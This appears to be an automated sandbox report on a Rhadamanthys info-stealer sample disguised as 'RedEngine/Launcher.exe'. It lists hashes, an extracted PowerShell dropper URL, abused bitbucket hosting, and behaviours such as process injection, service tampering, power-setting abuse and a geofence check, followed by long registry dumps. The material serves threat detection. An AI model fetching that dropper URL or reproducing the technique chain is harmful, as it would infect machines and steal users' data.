rhadamanthys | c1c897fccbac99e89d7dcfaecb8a97bcfe6250f9ab1160f190717ef1cfcb4258

Analysis

max time kernel
150s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
25-06-2024 11:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RedEngine/Launcher.exe
Size

7KB
MD5

eee2a79d3170f463e9697ddb8b97d41e
SHA1

818c82b1743c91f423c92742b54355b2058ff417
SHA256

a4569f2cabda528425ec397aef16d6f8fc15ca94664f6f98d738d0b3dc570b41
SHA512

139b6366a088d9aaa055fae4c7853c872fe4a31dfb7dc8e3961f144db0d712342fd4e9ef6f20e5f3cbb225a4f23c3ed24e55d144f9342398e8305f54a327d5ea
SSDEEP

192:nx92qvjK3xszfzzztCbxbsIcaqcINv/DvxIcaBlNtUqKwceNdM:x91v4O5CbxbbcaqcIND6cazNt/BcebM

Score

10^/10

rhadamanthys evasion execution persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/pancek61111111111111/raw

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

axfu4rpx.rry0.exe

description pid process target process

PID 3984 created 2512 3984 axfu4rpx.rry0.exe sihost.exe
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

6 1732 powershell.exe
11 1732 powershell.exe
31 4936 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4936 powershell.exe
3716 powershell.exe
1732 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

description	pid	process	target process
PID 3984 created 2512	3984	axfu4rpx.rry0.exe	sihost.exe

flow	pid	process
6	1732	powershell.exe
11	1732	powershell.exe
31	4936	powershell.exe

pid	process
4936	powershell.exe
3716	powershell.exe
1732	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

axfu4rpx.rry2.exeLauncher.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	axfu4rpx.rry2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	Launcher.exe

Executes dropped EXE 3 IoCs

Processes:

axfu4rpx.rry0.exeaxfu4rpx.rry1.exeaxfu4rpx.rry2.exe

pid process

3984 axfu4rpx.rry0.exe
4872 axfu4rpx.rry1.exe
1568 axfu4rpx.rry2.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

10 bitbucket.org
11 bitbucket.org
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

3948 powercfg.exe
1732 powercfg.exe
4008 powercfg.exe
3112 powercfg.exe

pid	process
3984	axfu4rpx.rry0.exe
4872	axfu4rpx.rry1.exe
1568	axfu4rpx.rry2.exe

flow	ioc
10	bitbucket.org
11	bitbucket.org

pid	process
3948	powercfg.exe
1732	powercfg.exe
4008	powercfg.exe
3112	powercfg.exe

Drops file in System32 directory 12 IoCs

Processes:

svchost.exeOfficeClickToRun.exeaxfu4rpx.rry1.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\MRT.exe	axfu4rpx.rry1.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

axfu4rpx.rry1.exe

description pid process target process

PID 4872 set thread context of 1016 4872 axfu4rpx.rry1.exe dialer.exe
Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5096 sc.exe
4092 sc.exe
2920 sc.exe
3320 sc.exe
4888 sc.exe
4644 sc.exe
1888 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 4872 set thread context of 1016	4872	axfu4rpx.rry1.exe	dialer.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

pid	process
5096	sc.exe
4092	sc.exe
2920	sc.exe
3320	sc.exe
4888	sc.exe
4644	sc.exe
1888	sc.exe

Modifies data under HKEY_USERS 14 IoCs

Processes:

OfficeClickToRun.exesvchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1719315394"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 25 Jun 2024 11:36:35 GMT"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={83CC3880-D931-4396-B8DE-3BC78124EFAB}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe

Modifies registry class 64 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\61e9cd21-7055-48f0- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bab8cccc-2aff-4c7e- = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\46543dc2-5bd9-4019- = "\\\\?\\Volume{8B429FC4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\bee75d1761020f883ce2536ba044a7d7d9f30a718322a5ce2a425589f8565a70"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9a1cb8b6-8136-47b6- = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10d5c38f-1cbc-4df4- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\61e9cd21-7055-48f0- = 8dc86af6f3c6da01	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9a1cb8b6-8136-47b6-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d9644a7-ad5d-460f- = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d9644a7-ad5d-460f-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9a1cb8b6-8136-47b6-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9a1cb8b6-8136-47b6- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\87044529-e6b1-49fc- = 7d165ff6f3c6da01	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0de22935-423a-4ebf-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\87044529-e6b1-49fc- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\61e9cd21-7055-48f0- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bab8cccc-2aff-4c7e- = "\\\\?\\Volume{8B429FC4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\bee75d1761020f883ce2536ba044a7d7d9f30a718322a5ce2a425589f8565a70"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d9644a7-ad5d-460f- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d9644a7-ad5d-460f- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000004df4eaf5f3c6da01b4ee79f6f3c6da01b4ee79f6f3c6da016a220a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d958985c2000336362366130316133643836393132363939376135396165633363373732306537326230336637373864613161643633333739376539383666303963616239640000b20009000400efbed958985cd958985c2e000000000000000000000000000000000000000000000000005bc52101330063006200360061003000310061003300640038003600390031003200360039003900370061003500390061006500630033006300370037003200300065003700320062003000330066003700370038006400610031006100640036003300330037003900370065003900380036006600300039006300610062003900640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e42050d81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33636236613031613364383639313236393937613539616563336337373230653732623033663737386461316164363333373937653938366630396361623964000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000656a656663646e6b000000000000000054e7a392dc7f2945a2d8ed2c0de7da5c7debaf984628ef119d11ea96628e18c954e7a392dc7f2945a2d8ed2c0de7da5c7debaf984628ef119d11ea96628e18c9ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003200300030003400300035003900330030002d0033003800370037003300330036003700330039002d0033003500330033003700350030003800330031002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c49f428b000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10d5c38f-1cbc-4df4-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0de22935-423a-4ebf-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0de22935-423a-4ebf-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9a1cb8b6-8136-47b6- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\87044529-e6b1-49fc- = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bab8cccc-2aff-4c7e-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d6b8a69e-0c7b-41ab-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10d5c38f-1cbc-4df4-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\46543dc2-5bd9-4019- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000af2cabf5f3c6da01af2cabf5f3c6da01af2cabf5f3c6da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d958985c2000626565373564313736313032306638383363653235333662613034346137643764396633306137313833323261356365326134323535383966383536356137300000b20009000400efbed958985cd958985c2e00000000000000000000000000000000000000000000000000511b1501620065006500370035006400310037003600310030003200300066003800380033006300650032003500330036006200610030003400340061003700640037006400390066003300300061003700310038003300320032006100350063006500320061003400320035003500380039006600380035003600350061003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e42050d81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c62656537356431373631303230663838336365323533366261303434613764376439663330613731383332326135636532613432353538396638353635613730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000656a656663646e6b000000000000000054e7a392dc7f2945a2d8ed2c0de7da5c76ebaf984628ef119d11ea96628e18c954e7a392dc7f2945a2d8ed2c0de7da5c76ebaf984628ef119d11ea96628e18c9ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003200300030003400300035003900330030002d0033003800370037003300330036003700330039002d0033003500330033003700350030003800330031002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c49f428b000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bab8cccc-2aff-4c7e- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008f2bdaf5f3c6da010b6b64f6f3c6da010b6b64f6f3c6da01ac5809000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d958985c2000626565373564313736313032306638383363653235333662613034346137643764396633306137313833323261356365326134323535383966383536356137300000b20009000400efbed958985cd958985c2e00000000000000000000000000000000000000000000000000511b1501620065006500370035006400310037003600310030003200300066003800380033006300650032003500330036006200610030003400340061003700640037006400390066003300300061003700310038003300320032006100350063006500320061003400320035003500380039006600380035003600350061003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e42050d81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c62656537356431373631303230663838336365323533366261303434613764376439663330613731383332326135636532613432353538396638353635613730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000656a656663646e6b000000000000000054e7a392dc7f2945a2d8ed2c0de7da5c7cebaf984628ef119d11ea96628e18c954e7a392dc7f2945a2d8ed2c0de7da5c7cebaf984628ef119d11ea96628e18c9ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003200300030003400300035003900330030002d0033003800370037003300330036003700330039002d0033003500330033003700350030003800330031002d0031003000300030000000000000003900000031535053b1166